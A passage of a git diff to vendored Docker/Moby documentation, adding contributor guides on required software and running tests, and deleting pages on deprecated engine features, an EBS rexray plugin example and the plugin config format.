+++ b/vendor/github.com/docker/docker/docs/contributing/software-required.md
@@ -0,0 +1,94 @@
+### Get the required software for Linux or macOS
+
+This page explains how to get the software you need to use a Linux or macOS
+machine for Moby development. Before you begin contributing you must have:
+
+*  a GitHub account
+* `git`
+* `make`
+* `docker`
+
+You'll notice that `go`, the language that Moby is written in, is not listed.
+That's because you don't need it installed; Moby's development environment
+provides it for you. You'll learn more about the development environment later.
+
+## Task 1. Get a GitHub account
+
+To contribute to the Moby project, you will need a <a
+href="https://github.com" target="_blank">GitHub account</a>. A free account is
+fine. All the Moby project repositories are public and visible to everyone.
+
+You should also have some experience using both the GitHub application and `git`
+on the command line.
+
+## Task 2. Install git
+
+Install `git` on your local system. You can check if `git` is on already on your
+system and properly installed with the following command:
+
+```bash
+$ git --version
+```
+
+This documentation is written using `git` version 2.2.2. Your version may be
+different depending on your OS.
+
+## Task 3. Install make
+
+Install `make`. You can check if `make` is on your system with the following
+command:
+
+```bash
+$ make -v
+```
+
+This documentation is written using GNU Make 3.81. Your version may be different
+depending on your OS.
+
+## Task 4. Install or upgrade Docker
+
+If you haven't already, install the Docker software using the
+<a href="https://docs.docker.com/engine/installation/" target="_blank">instructions for your operating system</a>.
+If you have an existing installation, check your version and make sure you have
+the latest Docker.
+
+To check if `docker` is already installed on Linux:
+
+```bash
+docker --version
+Docker version 17.10.0-ce, build f4ffd25
+```
+
+On macOS or Windows, you should have installed Docker for Mac or
+Docker for Windows.
+
+```bash
+$ docker --version
+Docker version 17.10.0-ce, build f4ffd25
+```
+
+## Tip for Linux users
+
+This guide assumes you have added your user to the `docker` group on your system.
+To check, list the group's contents:
+
+```
+$ getent group docker
+docker:x:999:ubuntu
+```
+
+If the command returns no matches, you have two choices. You can preface this
+guide's `docker` commands with `sudo` as you work. Alternatively, you can add
+your user to the `docker` group as follows:
+
+```bash
+$ sudo usermod -aG docker ubuntu
+```
+
+You must log out and log back in for this modification to take effect.
+
+
+## Where to go next
+
+In the next section, you'll [learn how to set up and configure Git for
+contributing to Moby](set-up-git.md).
diff --git a/vendor/github.com/docker/docker/docs/contributing/test.md b/vendor/github.com/docker/docker/docs/contributing/test.md
new file mode 100644
index 0000000000..fdcee328a9
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/contributing/test.md
@@ -0,0 +1,244 @@
+### Run tests
+
+Contributing includes testing your changes. If you change the Moby code, you
+may need to add a new test or modify an existing test. Your contribution could
+even be adding tests to Moby. For this reason, you need to know a little
+about Moby's test infrastructure.
+
+This section describes tests you can run in the `dry-run-test` branch of your Docker
+fork. If you have followed along in this guide, you already have this branch.
+If you don't have this branch, you can create it or simply use another of your
+branches.
+
+## Understand how to test Moby
+
+Moby tests use the Go language's test framework. In this framework, files
+whose names end in `_test.go` contain test code; you'll find test files like
+this throughout the Moby repo. Use these files for inspiration when writing
+your own tests. For information on Go's test framework, see <a
+href="http://golang.org/pkg/testing/" target="_blank">Go's testing package
+documentation</a> and the <a href="http://golang.org/cmd/go/#hdr-Test_packages"
+target="_blank">go test help</a>.
+
+You are responsible for _unit testing_ your contribution when you add new or
+change existing Moby code. A unit test is a piece of code that invokes a
+single, small piece of code (_unit of work_) to verify the unit works as
+expected.
+
+Depending on your contribution, you may need to add _integration tests_. These
+are tests that combine two or more work units into one component. These work
+units each have unit tests and then, together, integration tests that test the
+interface between the components. The `integration` and `integration-cli`
+directories in the Docker repository contain integration test code.  Note that
+`integration-cli` tests are now deprecated in the Moby project, and new tests
+cannot be added to this suite - add `integration` tests instead using the API
+client.
+
+Testing is its own specialty. If you aren't familiar with testing techniques,
+there is a lot of information available to you on the Web. For now, you should
+understand that, the Docker maintainers may ask you to write a new test or
+change an existing one.
+
+## Run tests on your local host
+
+Before submitting a pull request with a code change, you should run the entire
+Moby Engine test suite. The `Makefile` contains a target for the entire test
+suite, named `test`. Also, it contains several targets for
+testing:
+
+| Target                 | What this target does                          |
+| ---------------------- | ---------------------------------------------- |
+| `test`                 | Run the unit, integration, and docker-py tests |
+| `test-unit`            | Run just the unit tests                        |
+| `test-integration`     | Run the integration tests                      |
+| `test-docker-py`       | Run the tests for the Docker API client        |
+
+Running the entire test suite on your current repository can take over half an
+hour. To run the test suite, do the following:
+
+1.  Open a terminal on your local host.
+
+2.  Change to the root of your Docker repository.
+
+    ```bash
+    $ cd moby-fork
+    ```
+
+3.  Make sure you are in your development branch.
+
+    ```bash
+    $ git checkout dry-run-test
+    ```
+
+4.  Run the `make test` command.
+
+    ```bash
+    $ make test
+    ```
+
+    This command does several things, it creates a container temporarily for
+    testing. Inside that container, the `make`:
+
+    * creates a new binary
+    * cross-compiles all the binaries for the various operating systems
+    * runs all the tests in the system
+
+    It can take approximate one hour to run all the tests. The time depends
+    on your host performance. The default timeout is 60 minutes, which is
+    defined in `hack/make.sh` (`${TIMEOUT:=60m}`). You can modify the timeout
+    value on the basis of your host performance. When they complete
+    successfully, you see the output concludes with something like this:
+
+    ```none
+    Ran 68 tests in 79.135s
+    ```
+
+## Run targets inside a development container
+
+If you are working inside a development container, you use the
+`hack/test/unit` script to run unit-tests, and `hack/make.sh` script to run
+integration and other tests. The `hack/make.sh` script doesn't
+have a single target that runs all the tests. Instead, you provide a single
+command line with multiple targets that does the same thing.
+
+Try this now.
+
+1.  Open a terminal and change to the `moby-fork` root.
+
+2.  Start a Moby development image.
+
+    If you are following along with this guide, you should have a
+    `dry-run-test` image.
+
+    ```bash
+    $ docker run --privileged --rm -ti -v `pwd`:/go/src/github.com/docker/docker dry-run-test /bin/bash
+    ```
+
+3.  Run the unit tests using the `hack/test/unit` script.
+
+    ```bash
+    # hack/test/unit
+    ```
+
+4.  Run the tests using the `hack/make.sh` script.
+
+    ```bash
+    # hack/make.sh dynbinary binary cross test-integration test-docker-py
+    ```
+
+    The tests run just as they did within your local host.
+
+    Of course, you can also run a subset of these targets too. For example, to run
+    just the integration tests:
+
+    ```bash
+    # hack/make.sh dynbinary binary cross test-integration
+    ```
+
+    Most test targets require that you build these precursor targets first:
+    `dynbinary binary cross`
+
+
+## Run unit tests
+
+We use golang standard [testing](https://golang.org/pkg/testing/)
+package or [gocheck](https://labix.org/gocheck) for our unit tests.
+
+You can use the `TESTDIRS` environment variable to run unit tests for
+a single package.
+
+```bash
+$ TESTDIRS='opts' make test-unit
+```
+
+You can also use the `TESTFLAGS` environment variable to run a single test. The
+flag's value is passed as arguments to the `go test` command. For example, from
+your local host you can run the `TestBuild` test with this command:
+
+```bash
+$ TESTFLAGS='-test.run ^TestValidateIPAddress$' make test-unit
+```
+
+On unit tests, it's better to use `TESTFLAGS` in combination with
+`TESTDIRS` to make it quicker to run a specific test.
+
+```bash
+$ TESTDIRS='opts' TESTFLAGS='-test.run ^TestValidateIPAddress$' make test-unit
+```
+
+## Run integration tests
+
+We use [gocheck](https://labix.org/gocheck) for our integration-cli tests.
+You can use the `TESTFLAGS` environment variable to run a single test. The
+flag's value is passed as arguments to the `go test` command. For example, from
+your local host you can run the `TestBuild` test with this command:
+
+```bash
+$ TESTFLAGS='-check.f DockerSuite.TestBuild*' make test-integration
+```
+
+To run the same test inside your Docker development container, you do this:
+
+```bash
+# TESTFLAGS='-check.f TestBuild*' hack/make.sh binary test-integration
+```
+
+## Test the Windows binary against a Linux daemon
+
+This explains how to test the Windows binary on a Windows machine set up as a
+development environment. The tests will be run against a daemon
+running on a remote Linux machine. You'll use **Git Bash** that came with the
+Git for Windows installation. **Git Bash**, just as it sounds, allows you to
+run a Bash terminal on Windows.
+
+1.  If you don't have one open already, start a Git Bash terminal.
+
+    ![Git Bash](images/git_bash.png)
+
+2.  Change to the `moby` source directory.
+
+    ```bash
+    $ cd /c/gopath/src/github.com/docker/docker
+    ```
+
+3.  Set `DOCKER_REMOTE_DAEMON` as follows:
+
+    ```bash
+    $ export DOCKER_REMOTE_DAEMON=1
+    ```
+
+4.  Set `DOCKER_TEST_HOST` to the `tcp://IP_ADDRESS:2376` value; substitute your
+    Linux machines actual IP address. For example:
+
+    ```bash
+    $ export DOCKER_TEST_HOST=tcp://213.124.23.200:2376
+    ```
+
+5.  Make the binary and run the tests:
+
+    ```bash
+    $ hack/make.sh binary test-integration
+    ```
+    Some tests are skipped on Windows for various reasons. You can see which
+    tests were skipped by re-running the make and passing in the
+   `TESTFLAGS='-test.v'` value. For example
+
+    ```bash
+    $ TESTFLAGS='-test.v' hack/make.sh binary test-integration
+    ```
+
+    Should you wish to run a single test such as one with the name
+    'TestExample', you can pass in `TESTFLAGS='-check.f TestExample'`. For
+    example
+
+    ```bash
+    $ TESTFLAGS='-check.f TestExample' hack/make.sh binary test-integration
+    ```
+
+You can now choose to make changes to the Moby source or the tests. If you
+make any changes, just run these commands again.
+
+## Where to go next
+
+Congratulations, you have successfully completed the basics you need to
+understand the Moby test framework.
diff --git a/vendor/github.com/docker/docker/docs/contributing/who-written-for.md b/vendor/github.com/docker/docker/docs/contributing/who-written-for.md
new file mode 100644
index 0000000000..1431f42c50
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/contributing/who-written-for.md
@@ -0,0 +1,49 @@
+### README first
+
+This section of the documentation contains a guide for Moby project users who want to
+contribute code or documentation to the Moby Engine project. As a community, we
+share rules of behavior and interaction. Make sure you are familiar with the <a
+href="https://github.com/moby/moby/blob/master/CONTRIBUTING.md#docker-community-guidelines"
+target="_blank">community guidelines</a> before continuing.
+
+## Where and what you can contribute
+
+The Moby project consists of not just one but several repositories on GitHub.
+So, in addition to the `moby/moby` repository, there is the
+`containerd/containerd` repo, the `moby/buildkit` repo, and several more.
+Contribute to any of these and you contribute to the Moby project.
+
+Not all Moby repositories use the Go language. Also, each repository has its
+own focus area. So, if you are an experienced contributor, think about
+contributing to a Moby project repository that has a language or a focus area you are
+familiar with.
+
+If you are new to the open source community, to Moby, or to formal
+programming, you should start out contributing to the `moby/moby`
+repository. Why? Because this guide is written for that repository specifically.
+
+Finally, code or documentation isn't the only way to contribute. You can report
+an issue, add to discussions in our community channel, write a blog post, or
+take a usability test. You can even propose your own type of contribution.
+Right now we don't have a lot written about this yet, but feel free to open an issue
+to discuss other contributions.
+
+## How to use this guide
+
+This is written for the distracted, the overworked, the sloppy reader with fair
+`git` skills and a failing memory for the GitHub GUI. The guide attempts to
+explain how to use the Moby Engine development environment as precisely,
+predictably, and procedurally as possible.
+
+Users who are new to Engine development should start by setting up their
+environment. Then, they should try a simple code change. After that, you should
+find something to work on or propose a totally new change.
+
+If you are a programming prodigy, you still may find this documentation useful.
+Please feel free to skim past information you find obvious or boring.
+
+## How to get started
+
+Start by getting the software you require. If you are on Mac or Linux, go to
+[get the required software for Linux or macOS](software-required.md). If you are
+on Windows, see [get the required software for Windows](software-req-win.md).
diff --git a/vendor/github.com/docker/docker/docs/deprecated.md b/vendor/github.com/docker/docker/docs/deprecated.md
deleted file mode 100644
index 1298370ba9..0000000000
--- a/vendor/github.com/docker/docker/docs/deprecated.md
+++ /dev/null
@@ -1,286 +0,0 @@
----
-aliases: ["/engine/misc/deprecated/"]
-title: "Deprecated Engine Features"
-description: "Deprecated Features."
-keywords: "docker, documentation, about, technology, deprecate"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# Deprecated Engine Features
-
-The following list of features are deprecated in Engine.
-To learn more about Docker Engine's deprecation policy,
-see [Feature Deprecation Policy](https://docs.docker.com/engine/#feature-deprecation-policy).
-
-
-### Top-level network properties in NetworkSettings
-
-**Deprecated In Release: v1.13.0**
-
-**Target For Removal In Release: v1.16**
-
-When inspecting a container, `NetworkSettings` contains top-level information
-about the default ("bridge") network;
-
-`EndpointID`, `Gateway`, `GlobalIPv6Address`, `GlobalIPv6PrefixLen`, `IPAddress`,
-`IPPrefixLen`, `IPv6Gateway`, and `MacAddress`.
-
-These properties are deprecated in favor of per-network properties in
-`NetworkSettings.Networks`. These properties were already "deprecated" in
-docker 1.9, but kept around for backward compatibility.
-
-Refer to [#17538](https://github.com/docker/docker/pull/17538) for further
-information.
-
-## `filter` param for `/images/json` endpoint
-**Deprecated In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)**
-
-**Target For Removal In Release: v1.16**
-
-The `filter` param to filter the list of image by reference (name or name:tag) is now implemented as a regular filter, named `reference`.
-
-### `repository:shortid` image references
-**Deprecated In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)**
-
-**Target For Removal In Release: v1.16**
-
-`repository:shortid` syntax for referencing images is very little used, collides with tag references can be confused with digest references.
-
-### `docker daemon` subcommand
-**Deprecated In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)**
-
-**Target For Removal In Release: v1.16**
-
-The daemon is moved to a separate binary (`dockerd`), and should be used instead.
-
-### Duplicate keys with conflicting values in engine labels
-**Deprecated In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)**
-
-**Target For Removal In Release: v1.16**
-
-Duplicate keys with conflicting values have been deprecated. A warning is displayed
-in the output, and an error will be returned in the future.
-
-### `MAINTAINER` in Dockerfile
-**Deprecated In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)**
-
-`MAINTAINER` was an early very limited form of `LABEL` which should be used instead.
-
-### API calls without a version
-**Deprecated In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)**
-
-**Target For Removal In Release: v1.16**
-
-API versions should be supplied to all API calls to ensure compatibility with
-future Engine versions. Instead of just requesting, for example, the URL
-`/containers/json`, you must now request `/v1.25/containers/json`.
-
-### Backing filesystem without `d_type` support for overlay/overlay2
-**Deprecated In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)**
-
-**Target For Removal In Release: v1.16**
-
-The overlay and overlay2 storage driver does not work as expected if the backing
-filesystem does not support `d_type`. For example, XFS does not support `d_type`
-if it is formatted with the `ftype=0` option.
-
-Please also refer to [#27358](https://github.com/docker/docker/issues/27358) for
-further information.
-
-### Three arguments form in `docker import`
-**Deprecated In Release: [v0.6.7](https://github.com/docker/docker/releases/tag/v0.6.7)**
-
-**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)**
-
-The `docker import` command format `file|URL|- [REPOSITORY [TAG]]` is deprecated since November 2013. It's no more supported.
-
-### `-h` shorthand for `--help`
-
-**Deprecated In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)**
-
-**Target For Removal In Release: v1.15**
-
-The shorthand (`-h`) is less common than `--help` on Linux and cannot be used
-on all subcommands (due to it conflicting with, e.g. `-h` / `--hostname` on
-`docker create`). For this reason, the `-h` shorthand was not printed in the
-"usage" output of subcommands, nor documented, and is now marked "deprecated".
-
-### `-e` and `--email` flags on `docker login`
-**Deprecated In Release: [v1.11.0](https://github.com/docker/docker/releases/tag/v1.11.0)**
-
-**Target For Removal In Release: v1.14**
-
-The docker login command is removing the ability to automatically register for an account with the target registry if the given username doesn't exist. Due to this change, the email flag is no longer required, and will be deprecated.
-
-### Separator (`:`) of `--security-opt` flag on `docker run`
-**Deprecated In Release: [v1.11.0](https://github.com/docker/docker/releases/tag/v1.11.0)**
-
-**Target For Removal In Release: v1.14**
-
-The flag `--security-opt` doesn't use the colon separator(`:`) anymore to divide keys and values, it uses the equal symbol(`=`) for consistency with other similar flags, like `--storage-opt`.
-
-### `/containers/(id or name)/copy` endpoint
-
-**Deprecated In Release: [v1.8.0](https://github.com/docker/docker/releases/tag/v1.8.0)**
-
-**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)**
-
-The endpoint `/containers/(id or name)/copy` is deprecated in favor of `/containers/(id or name)/archive`.
-
-### Ambiguous event fields in API
-**Deprecated In Release: [v1.10.0](https://github.com/docker/docker/releases/tag/v1.10.0)**
-
-The fields `ID`, `Status` and `From` in the events API have been deprecated in favor of a more rich structure.
-See the events API documentation for the new format.
-
-### `-f` flag on `docker tag`
-**Deprecated In Release: [v1.10.0](https://github.com/docker/docker/releases/tag/v1.10.0)**
-
-**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)**
-
-To make tagging consistent across the various `docker` commands, the `-f` flag on the `docker tag` command is deprecated. It is not longer necessary to specify `-f` to move a tag from one image to another. Nor will `docker` generate an error if the `-f` flag is missing and the specified tag is already in use.
-
-### HostConfig at API container start
-**Deprecated In Release: [v1.10.0](https://github.com/docker/docker/releases/tag/v1.10.0)**
-
-**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)**
-
-Passing an `HostConfig` to `POST /containers/{name}/start` is deprecated in favor of
-defining it at container creation (`POST /containers/create`).
-
-### `--before` and `--since` flags on `docker ps`
-
-**Deprecated In Release: [v1.10.0](https://github.com/docker/docker/releases/tag/v1.10.0)**
-
-**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)**
-
-The `docker ps --before` and `docker ps --since` options are deprecated.
-Use `docker ps --filter=before=...` and `docker ps --filter=since=...` instead.
-
-### `--automated` and `--stars` flags on `docker search`
-
-**Deprecated in Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)**
-
-**Target For Removal In Release: v1.15**
-
-The `docker search --automated` and `docker search --stars` options are deprecated.
-Use `docker search --filter=is-automated=...` and `docker search --filter=stars=...` instead.
-
-### Driver Specific Log Tags
-**Deprecated In Release: [v1.9.0](https://github.com/docker/docker/releases/tag/v1.9.0)**
-
-**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)**
-
-Log tags are now generated in a standard way across different logging drivers.
-Because of which, the driver specific log tag options `syslog-tag`, `gelf-tag` and
-`fluentd-tag` have been deprecated in favor of the generic `tag` option.
-
-    docker --log-driver=syslog --log-opt tag="{{.ImageName}}/{{.Name}}/{{.ID}}"
-
-### LXC built-in exec driver
-**Deprecated In Release: [v1.8.0](https://github.com/docker/docker/releases/tag/v1.8.0)**
-
-**Removed In Release: [v1.10.0](https://github.com/docker/docker/releases/tag/v1.10.0)**
-
-The built-in LXC execution driver, the lxc-conf flag, and API fields have been removed.
-
-### Old Command Line Options
-**Deprecated In Release: [v1.8.0](https://github.com/docker/docker/releases/tag/v1.8.0)**
-
-**Removed In Release: [v1.10.0](https://github.com/docker/docker/releases/tag/v1.10.0)**
-
-The flags `-d` and `--daemon` are deprecated in favor of the `daemon` subcommand:
-
-    docker daemon -H ...
-
-The following single-dash (`-opt`) variant of certain command line options
-are deprecated and replaced with double-dash options (`--opt`):
-
-    docker attach -nostdin
-    docker attach -sig-proxy
-    docker build -no-cache
-    docker build -rm
-    docker commit -author
-    docker commit -run
-    docker events -since
-    docker history -notrunc
-    docker images -notrunc
-    docker inspect -format
-    docker ps -beforeId
-    docker ps -notrunc
-    docker ps -sinceId
-    docker rm -link
-    docker run -cidfile
-    docker run -dns
-    docker run -entrypoint
-    docker run -expose
-    docker run -link
-    docker run -lxc-conf
-    docker run -n
-    docker run -privileged
-    docker run -volumes-from
-    docker search -notrunc
-    docker search -stars
-    docker search -t
-    docker search -trusted
-    docker tag -force
-
-The following double-dash options are deprecated and have no replacement:
-
-    docker run --cpuset
-    docker run --networking
-    docker ps --since-id
-    docker ps --before-id
-    docker search --trusted
-
-**Deprecated In Release: [v1.5.0](https://github.com/docker/docker/releases/tag/v1.5.0)**
-
-**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)**
-
-The single-dash (`-help`) was removed, in favor of the double-dash `--help`
-
-    docker -help
-    docker [COMMAND] -help
-
-### `--run` flag on docker commit
-
-**Deprecated In Release: [v0.10.0](https://github.com/docker/docker/releases/tag/v0.10.0)**
-
-**Removed In Release: [v1.13.0](https://github.com/docker/docker/releases/tag/v1.13.0)**
-
-The flag `--run` of the docker commit (and its short version `-run`) were deprecated in favor
-of the `--changes` flag that allows to pass `Dockerfile` commands.
-
-
-### Interacting with V1 registries
-
-**Disabled By Default In Release: v1.14**
-
-**Target For Removal In Release: v1.17**
-
-Version 1.9 adds a flag (`--disable-legacy-registry=false`) which prevents the
-docker daemon from `pull`, `push`, and `login` operations against v1
-registries.  Though enabled by default, this signals the intent to deprecate
-the v1 protocol.
-
-Support for the v1 protocol to the public registry was removed in 1.13. Any
-mirror configurations using v1 should be updated to use a
-[v2 registry mirror](https://docs.docker.com/registry/recipes/mirror/).
-
-### Docker Content Trust ENV passphrase variables name change
-**Deprecated In Release: [v1.9.0](https://github.com/docker/docker/releases/tag/v1.9.0)**
-
-**Removed In Release: [v1.12.0](https://github.com/docker/docker/releases/tag/v1.12.0)**
-
-Since 1.9, Docker Content Trust Offline key has been renamed to Root key and the Tagging key has been renamed to Repository key. Due to this renaming, we're also changing the corresponding environment variables
-
-- DOCKER_CONTENT_TRUST_OFFLINE_PASSPHRASE is now named DOCKER_CONTENT_TRUST_ROOT_PASSPHRASE
-- DOCKER_CONTENT_TRUST_TAGGING_PASSPHRASE is now named DOCKER_CONTENT_TRUST_REPOSITORY_PASSPHRASE
diff --git a/vendor/github.com/docker/docker/docs/extend/EBS_volume.md b/vendor/github.com/docker/docker/docs/extend/EBS_volume.md
deleted file mode 100644
index 8c64efa164..0000000000
--- a/vendor/github.com/docker/docker/docs/extend/EBS_volume.md
+++ /dev/null
@@ -1,164 +0,0 @@
----
-description: Volume plugin for Amazon EBS
-keywords: "API, Usage, plugins, documentation, developer, amazon, ebs, rexray, volume"
-title: Volume plugin for Amazon EBS
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# A proof-of-concept Rexray plugin
-
-In this example, a simple Rexray plugin will be created for the purposes of using
-it on an Amazon EC2 instance with EBS. It is not meant to be a complete Rexray plugin.
-
-The example source is available at [https://github.com/tiborvass/rexray-plugin](https://github.com/tiborvass/rexray-plugin).
-
-To learn more about Rexray: [https://github.com/codedellemc/rexray](https://github.com/codedellemc/rexray)
-
-## 1. Make a Docker image
-
-The following is the Dockerfile used to containerize rexray.
-
-```Dockerfile
-FROM debian:jessie
-RUN apt-get update && apt-get install -y --no-install-recommends wget ca-certificates
-RUN wget https://dl.bintray.com/emccode/rexray/stable/0.6.4/rexray-Linux-x86_64-0.6.4.tar.gz -O rexray.tar.gz && tar -xvzf rexray.tar.gz -C /usr/bin && rm rexray.tar.gz
-RUN mkdir -p /run/docker/plugins /var/lib/libstorage/volumes
-ENTRYPOINT ["rexray"]
-CMD ["--help"]
-```
-
-To build it you can run `image=$(cat Dockerfile | docker build -q -)` and `$image`
-will reference the containerized rexray image.
-
-## 2. Extract rootfs
-
-```sh
-$ TMPDIR=/tmp/rexray  # for the purpose of this example
-$  # create container without running it, to extract the rootfs from image
-$ docker create --name rexray "$image"
-$  # save the rootfs to a tar archive
-$ docker export -o $TMPDIR/rexray.tar rexray
-$  # extract rootfs from tar archive to a rootfs folder
-$ ( mkdir -p $TMPDIR/rootfs; cd $TMPDIR/rootfs; tar xf ../rexray.tar )
-```
-
-## 3. Add plugin configuration
-
-We have to put the following JSON to `$TMPDIR/config.json`:
-
-```json
-{
-      "Args": {
-        "Description": "",
-        "Name": "",
-        "Settable": null,
-        "Value": null
-      },
-      "Description": "A proof-of-concept EBS plugin (using rexray) for Docker",
-      "Documentation": "https://github.com/tiborvass/rexray-plugin",
-      "Entrypoint": [
-        "/usr/bin/rexray", "service", "start", "-f"
-      ],
-      "Env": [
-        {
-          "Description": "",
-          "Name": "REXRAY_SERVICE",
-          "Settable": [
-            "value"
-          ],
-          "Value": "ebs"
-        },
-        {
-          "Description": "",
-          "Name": "EBS_ACCESSKEY",
-          "Settable": [
-            "value"
-          ],
-          "Value": ""
-        },
-        {
-          "Description": "",
-          "Name": "EBS_SECRETKEY",
-          "Settable": [
-            "value"
-          ],
-          "Value": ""
-        }
-      ],
-      "Interface": {
-        "Socket": "rexray.sock",
-        "Types": [
-          "docker.volumedriver/1.0"
-        ]
-      },
-      "Linux": {
-        "AllowAllDevices": true,
-        "Capabilities": ["CAP_SYS_ADMIN"],
-        "Devices": null
-      },
-      "Mounts": [
-        {
-          "Source": "/dev",
-          "Destination": "/dev",
-          "Type": "bind",
-          "Options": ["rbind"]
-        }
-      ],
-      "Network": {
-        "Type": "host"
-      },
-      "PropagatedMount": "/var/lib/libstorage/volumes",
-      "User": {},
-      "WorkDir": ""
-}
-```
-
-Please note a couple of points:
-- `PropagatedMount` is needed so that the docker daemon can see mounts done by the
-rexray plugin from within the container, otherwise the docker daemon is not able
-to mount a docker volume.
-- The rexray plugin needs dynamic access to host devices. For that reason, we
-have to give it access to all devices under `/dev` and set `AllowAllDevices` to
-true for proper access.
-- The user of this simple plugin can change only 3 settings: `REXRAY_SERVICE`,
-`EBS_ACCESSKEY` and `EBS_SECRETKEY`. This is because of the reduced scope of this
-plugin. Ideally other rexray parameters could also be set.
-
-## 4. Create plugin
-
-`docker plugin create tiborvass/rexray-plugin "$TMPDIR"` will create the plugin.
-
-```sh
-$ docker plugin ls
-ID                  NAME                             DESCRIPTION                         ENABLED
-2475a4bd0ca5        tiborvass/rexray-plugin:latest   A rexray volume plugin for Docker   false
-```
-
-## 5. Test plugin
-
-```sh
-$ docker plugin set tiborvass/rexray-plugin EBS_ACCESSKEY=$AWS_ACCESSKEY EBS_SECRETKEY=$AWS_SECRETKEY`
-$ docker plugin enable tiborvass/rexray-plugin
-$ docker volume create -d tiborvass/rexray-plugin my-ebs-volume
-$ docker volume ls
-DRIVER                              VOLUME NAME
-tiborvass/rexray-plugin:latest      my-ebs-volume
-$ docker run --rm -v my-ebs-volume:/volume busybox sh -c 'echo bye > /volume/hi'
-$ docker run --rm -v my-ebs-volume:/volume busybox cat /volume/hi
-bye
-```
-
-## 6. Push plugin
-
-First, ensure you are logged in with `docker login`. Then you can run:
-`docker plugin push tiborvass/rexray-plugin` to push it like a regular docker
-image to a registry, to make it available for others to install via
-`docker plugin install tiborvass/rexray-plugin EBS_ACCESSKEY=$AWS_ACCESSKEY EBS_SECRETKEY=$AWS_SECRETKEY`.
diff --git a/vendor/github.com/docker/docker/docs/extend/config.md b/vendor/github.com/docker/docker/docs/extend/config.md
deleted file mode 100644
index 096d2d0822..0000000000
--- a/vendor/github.com/docker/docker/docs/extend/config.md
+++ /dev/null
@@ -1,225 +0,0 @@
----
-title: "Plugin config"
-description: "How develop and use a plugin with the managed plugin system"
-keywords: "API, Usage, plugins, documentation, developer"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-
-# Plugin Config Version 1 of Plugin V2
-
-This document outlines the format of the V0 plugin configuration. The plugin
-config described herein was introduced in the Docker daemon in the [v1.12.0
-release](https://github.com/docker/docker/commit/f37117045c5398fd3dca8016ea8ca0cb47e7312b).
-
-Plugin configs describe the various constituents of a docker plugin. Plugin
-configs can be serialized to JSON format with the following media types:
-
-Config Type  | Media Type
-------------- | -------------
-config  | "application/vnd.docker.plugin.v1+json"
-
-
-## *Config* Field Descriptions
-
-Config provides the base accessible fields for working with V0 plugin format
- in the registry.
-
-- **`description`** *string*
-
-	description of the plugin
-
-- **`documentation`** *string*
-
-  	link to the documentation about the plugin
-
-- **`interface`** *PluginInterface*
-
-   interface implemented by the plugins, struct consisting of the following fields
-
-    - **`types`** *string array*
-
-      types indicate what interface(s) the plugin currently implements.
-
-      currently supported:
-
-      	- **docker.volumedriver/1.0**
-
-      	- **docker.authz/1.0**
-
-    - **`socket`** *string*
-
-      socket is the name of the socket the engine should use to communicate with the plugins.
-      the socket will be created in `/run/docker/plugins`.
-
-
-- **`entrypoint`** *string array*
-
-   entrypoint of the plugin, see [`ENTRYPOINT`](../reference/builder.md#entrypoint)
-
-- **`workdir`** *string*
-
-   workdir of the plugin, see [`WORKDIR`](../reference/builder.md#workdir)
-
-- **`network`** *PluginNetwork*
-
-   network of the plugin, struct consisting of the following fields
-
-    - **`type`** *string*
-
-      network type.
-
-      currently supported:
-
-      	- **bridge**
-      	- **host**
-      	- **none**
-
-- **`mounts`** *PluginMount array*
-
-   mount of the plugin, struct consisting of the following fields, see [`MOUNTS`](https://github.com/opencontainers/runtime-spec/blob/master/config.md#mounts)
-
-    - **`name`** *string*
-
-	  name of the mount.
-
-    - **`description`** *string*
-
-      description of the mount.
-
-    - **`source`** *string*
-
-	  source of the mount.
-
-    - **`destination`** *string*
-
-	  destination of the mount.
-
-    - **`type`** *string*
-
-      mount type.
-
-    - **`options`** *string array*
-
-	  options of the mount.
-
-- **`propagatedMount`** *string*
-
-   path to be mounted as rshared, so that mounts under that path are visible to docker. This is useful for volume plugins.
-   This path will be bind-mounted outisde of the plugin rootfs so it's contents
-   are preserved on upgrade.
-
-- **`env`** *PluginEnv array*
-
-   env of the plugin, struct consisting of the following fields
-
-    - **`name`** *string*
-
-	  name of the env.
-
-    - **`description`** *string*
-
-      description of the env.
-
-    - **`value`** *string*
-
-	  value of the env.
-
-- **`args`** *PluginArgs*
-
-   args of the plugin, struct consisting of the following fields
-
-    - **`name`** *string*
-
-	  name of the args.
-
-    - **`description`** *string*
-
-      description of the args.
-
-    - **`value`** *string array*
-
-	  values of the args.
-
-- **`linux`** *PluginLinux*
-
-    - **`capabilities`** *string array*
-
